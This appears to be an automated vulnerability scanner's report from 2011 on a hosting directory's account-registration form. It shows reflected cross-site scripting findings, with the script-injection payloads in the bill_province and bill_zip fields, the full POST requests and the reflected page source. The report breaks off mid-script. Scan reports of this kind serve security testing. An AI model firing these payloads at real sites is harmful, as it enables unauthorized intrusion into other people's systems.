width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='C4C0A65D598D2DD53D3D641B453714E8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='C4C0A65D598D2DD5378BEF265F61D3956F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='C4C0A65D598D2DD5065A57925989FF9EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD5EF1AF47B7C0911D3C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='C4C0A65D598D2DD58B186E7B9EA1FF4D6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='C4C0A65D598D2DD59ED5134AB67A2896C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='C4C0A65D598D2DD5D0A693B20553C129C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='C4C0A65D598D2DD5E4E5298287E37D856F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='C4C0A65D598D2DD5AD020880A1843635C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='C4C0A65D598D2DD5DD299BAB85433DAD6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='C4C0A65D598D2DD55AD81774A033865AC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='C4C0A65D598D2DD57948143B10AF53B0C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='C4C0A65D598D2DD543F1663CC5B110F5C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD571723B4773B2CE89C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='C4C0A65D598D2DD56272F6C77777133EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='C4C0A65D598D2DD504569EE57D567C0DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='C4C0A65D598D2DD55DF2BA1F961B70D86F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='C4C0A65D598D2DD570973221E0AE80AE6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='C4C0A65D598D2DD55DFB4AB870F1BD666F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
'"--></style></script><script>alert(0x001C9D)</script>
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001C9D)%3c%2fscript%3e&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:49:26 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='C4C0A65D598D2DD5304A9C2610BDFBE2C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='C4C0A65D598D2DD557E18C702F9259EC6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='C4C0A65D598D2DD5AFD9667D878D0369C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD541777A601D49E2D3C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='C4C0A65D598D2DD5E835CF32BACCA66A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='C4C0A65D598D2DD538FA3D25ABA6EFAFC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='C4C0A65D598D2DD542C3E5B7E038619DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='C4C0A65D598D2DD556395956634921856F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='C4C0A65D598D2DD534D453736EE3B2A0C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='C4C0A65D598D2DD5B903979280E749556F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='C4C0A65D598D2DD55B533651D921827BC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='C4C0A65D598D2DD5C921FB5652F713E7C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='C4C0A65D598D2DD5CE385752013F634EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD53D242BB92B46EB37C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='C4C0A65D598D2DD5FCC4560C0EEA2BDAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='C4C0A65D598D2DD509C734A3225E0949C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='C4C0A65D598D2DD5412B815FD6E1C71E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='C4C0A65D598D2DD5B3FBD2ACCEAE33D16F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='C4C0A65D598D2DD58C61138E6ABEBC7A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
'"--></style></script><script>alert(0x001CAD)</script>
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CAD)%3c%2fscript%3e&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:49:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if 